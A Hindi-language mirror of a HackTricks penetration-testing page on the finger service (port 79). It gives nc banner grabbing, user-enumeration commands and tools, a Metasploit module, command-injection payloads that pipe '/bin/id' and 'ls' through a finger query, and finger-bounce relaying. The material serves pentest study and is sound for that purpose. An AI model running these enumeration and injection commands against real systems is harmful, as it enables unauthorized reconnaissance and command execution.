mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 06:30:37 +00:00
6.2 KiB
6.2 KiB
79 - पेंटेस्टिंग फिंगर
जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
HackTricks का समर्थन करने के अन्य तरीके:
- अगर आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो सब्सक्रिप्शन प्लान देखें!
- आधिकारिक PEASS और HackTricks स्वैग प्राप्त करें
- हमारे विशेष NFTs संग्रह The PEASS Family खोजें
- शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह और हमें ट्विटर 🐦 @carlospolopm पर फॉलो करें।
- अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके HackTricks और HackTricks Cloud github repos में।
मूल जानकारी
फिंगर प्रोग्राम/सेवा का उपयोग कंप्यूटर उपयोगकर्ताओं के बारे में विवरण प्राप्त करने के लिए किया जाता है। सामान्यत: प्रदान की जाने वाली जानकारी में उपयोगकर्ता का लॉगिन नाम, पूरा नाम और, कई मामलों में, अतिरिक्त विवरण शामिल हो सकते हैं। ये अतिरिक्त विवरण कार्यालय स्थान और फोन नंबर (यदि उपलब्ध है), उपयोगकर्ता ने कब लॉग इन किया, निष्क्रिय समय की अवधि (आइडल समय), उपयोगकर्ता द्वारा अंतिम बार मेल पढ़ा गया, और उपयोगकर्ता की योजना और परियोजना फ़ाइलों की सामग्री शामिल हो सकती है।
डिफ़ॉल्ट पोर्ट: 79
PORT STATE SERVICE
79/tcp open finger
जांच
बैनर ग्रबिंग/मूल कनेक्शन
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
उपयोगकर्ता गणना
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
आप finger-user-enum का उपयोग कर सकते हैं pentestmonkey से, कुछ उदाहरण:
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
Nmap डिफ़ॉल्ट स्क्रिप्ट का उपयोग करने के लिए एक स्क्रिप्ट को निष्पादित करता है
Metasploit Nmap से अधिक तरीके का उपयोग करता है
use auxiliary/scanner/finger/finger_users
शोडन
port:79 USER
कमांड निष्पादन
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
फिंगर बाउंस
एक सिस्टम का उपयोग एक फिंगर रिले के रूप में करें
finger user@host@victim
finger @internal@external
जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!
दूसरे तरीके HackTricks का समर्थन करने के लिए:
- अगर आप चाहते हैं कि आपकी कंपनी HackTricks में विज्ञापित हो या HackTricks को PDF में डाउनलोड करें तो सब्सक्रिप्शन प्लान्स देखें!
- आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
- हमारे विशेष NFTs संग्रह The PEASS Family खोजें
- शामिल हों 💬 Discord समूह या टेलीग्राम समूह या हमें ट्विटर 🐦 @carlospolopm** पर फॉलो** करें।
- अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके HackTricks और HackTricks Cloud github repos में।